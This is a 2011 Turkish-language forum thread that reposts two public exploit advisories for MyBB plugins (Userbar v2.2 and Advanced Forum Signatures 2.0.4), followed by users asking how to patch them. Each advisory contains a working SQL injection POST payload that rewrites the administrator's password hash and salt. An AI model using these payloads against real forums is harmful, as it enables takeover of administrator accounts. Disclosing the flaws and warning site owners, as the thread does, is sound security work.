myBB Güvenlik Plugin Açıkları [Yeni] - Ryuzaki - 11.10.2011
Hayırlı Sabahlar.
Kod:
---------------------------------------------------------------------
Exploit Title : MyBB Forum Userbar Plugin (Userbar v2.2)
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/userbar-plugin
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
>> userbarsettings.php
POST -> setting1=1&setting2=1&setting3=3&image2=1',password='90be07bf33c5e547c3e78b236a83f497',salt='aXZV15uC&uid=1&submit=Submit
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
# 1337day.com [2011-10-10]
Kod:
http://www.1337day.com/exploits/17047
Kod:
---------------------------------------------------------------------
Exploit Title : MyBB Advanced Forum Signatures (afsignatures-2.0.4)
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/advanced-forum-signatures
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
>> signature.php
POST -> afs_html=<a+href="http://localhost/mybb"><img+src="http://localhost/mybb/signature.php?uid=1"+alt=""+/></a>&afs_bbcode=[url=http://localhost/mybb][img]http://localhost/mybb/signature.php?uid=1[/img][/url]&afs_type=bar&afs_background=Default_Blue&afs_showonline=1&afs_full_line1=username&afs_full_line2=usergroup&afs_full_line3=postcount&afs_full_line4=registrationdate&afs_full_line5=reputation&afs_full_line6=blank&afs_bar_left=username&afs_bar_center=usergroup&afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg' WHERE `uid`='1';--
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
# 1337day.com [2011-10-10]
Kod:
http://www.1337day.com/exploits/17046
İki Plugin'ide Güvenlik Açıklarını Kapatmadan Kullanmayınız, Henüz Dün Gece Yayınlandı Bunlar, Sql Açığı Mevcut Bu Pluginlerde, Kodlarda Zararlı Karakterleri Filtreleme İşlemi Yapmadan, Kullanmayınız.
Sql Açığıyla Kısa Sürede Admin Bilgilerinize Ulaşabilirler...
Neyse, Kullanan ve Açığı Kapatamayan varsa İletişime Geçebilir, Yardımcı Olurum.
İyi Günler Diliyorum.
Cvp: myBB Güvenlik Plugin Açıkları [Yeni] - Mahir Can Apaydın - 11.10.2011
hocam daha önce açık kapatmamıştım nasıl kapanır yardım edermisiniz
Cvp: myBB Güvenlik Plugin Açıkları [Yeni] - RebeL - 11.10.2011
Bu iki pluginin türkçesi varmı ? Birde açıkları nasıl kapatılıyor kullanmak istiyorum sitemde .
Cvp: myBB Güvenlik Plugin Açıkları [Yeni] - Ryuzaki - 11.10.2011
Pluginlerin Türkçesi Mevcut mu Bilmiyorum Arkadaşlar, Fakat Akşama Bununla İlgili (Açıkları Kapama) Bir Makale Yazacağım .
İlginize Teşekkürler.
Cvp: myBB Güvenlik Plugin Açıkları [Yeni] - RebeL - 11.10.2011
Biri türkçe çevirisini yapıp sunsa çok makbule geçer kullanmak istiyorum güzel eklentiler .
|